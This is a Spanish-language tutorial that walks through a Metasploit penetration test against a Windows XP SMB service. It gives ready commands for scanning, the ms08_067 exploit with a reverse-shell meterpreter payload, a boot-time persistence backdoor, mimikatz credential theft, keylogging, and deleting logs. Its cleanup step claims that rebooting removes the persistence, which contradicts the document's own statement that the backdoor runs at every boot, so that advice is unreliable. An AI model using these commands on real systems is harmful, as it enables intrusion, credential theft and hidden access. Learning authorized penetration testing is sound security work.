Este manual ofrece una guía paso a paso para llevar a cabo una prueba de penetración explotando una vulnerabilidad usando Metasploit Framework. El objetivo es ilustrar el proceso desde el escaneo inicial hasta la explotación y post-explotación.
Sección 1: Preparación del Entorno
Antes de comenzar, asegúrate de tener un entorno controlado y autorizado para realizar pruebas de penetración.
1.1 Requisitos Previos
- Un sistema operativo Debian 12 o similar con Metasploit Framework instalado.
- Acceso a la red objetivo.
- Permiso explícito para realizar pruebas.
1.2 Verificación de la Instalación de Metasploit
Ejecuta el siguiente comando para iniciar Metasploit Framework: msfconsole
Confirma que la base de datos está conectada: db_status
Deberías ver un mensaje indicando «Connected to msf_database».
Sección 2: Reconocimiento y Escaneo
2.1 Escaneo con Nmap
Usa Nmap para identificar hosts activos y servicios abiertos: nmap -sS -sV 192.168.1.0/24
Esto listará los puertos abiertos y las versiones de servicios, cruciales para identificar vulnerabilidades.
2.2 Importación de Resultados a Metasploit
Importa los resultados del escaneo a Metasploit: db_import /ruta/a/resultado_nmap.xml
Visualiza los hosts importados: hosts
Sección 3: Selección de la Vulnerabilidad
3.1 Identificación de Vulnerabilidades
Supongamos que el escaneo identifica un servicio SMB en un sistema Windows XP (puerto 445). Busca un exploit relacionado: search smb
3.2 Elección del Exploit
Selecciona el módulo de exploit apropiado, por ejemplo: use exploit/windows/smb/ms08_067_netapi
Sección 4: Configuración del Exploit
4.1 Configuración de Opciones
Revisa las opciones disponibles: show options
Configura las opciones necesarias:
set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
4.2 Comprobación de Vulnerabilidad
Verifica si el objetivo es vulnerable: check
Un resultado positivo indica que el sistema puede ser explotado.
Sección 5: Ejecución del Exploit
5.1 Lanzamiento del Exploit
Ejecuta el exploit: run
Si es exitoso, deberías obtener una sesión de Meterpreter.
5.2 Comandos Básicos en Meterpreter
- Ver información del sistema:
sysinfo
- Listar archivos en el directorio actual:
ls
- Descargar un archivo: download archivo.txt /ruta/local
4. Obtener una shell del sistema:
```bash
shell
Sección 6: Post-Explotación
6.1 Persistencia
Configura un mecanismo de persistencia para mantener el acceso: run persistence -U -i 10 -p 4444 -r 192.168.1.10
Esto crea un backdoor que se ejecuta cada vez que el sistema arranca.
6.2 Recolección de Información
- Obtener credenciales:
run post/windows/gather/credentials/mimikatz
- Capturar el registro de teclas:
keyscan_start keyscan_dump
Sección 7: Limpieza del Sistema
Es fundamental eliminar cualquier rastro de la prueba:
- Sal de Meterpreter:
exit
- Reinicia el sistema objetivo para eliminar la persistencia.
- Borra los logs generados durante la prueba.
Sección 8: Informe Final
Documenta los hallazgos en un informe profesional:
- Descripción del sistema objetivo.
- Detalles de las vulnerabilidades explotadas.
- Impacto potencial.
- Recomendaciones para mitigar los riesgos.
Conclusión
Este manual proporciona una guía completa para realizar pruebas de penetración utilizando Metasploit Framework. Siempre recuerda realizar estas actividades de manera ética y con autorización. Las habilidades adquiridas deben usarse para fortalecer la seguridad, no para comprometerla.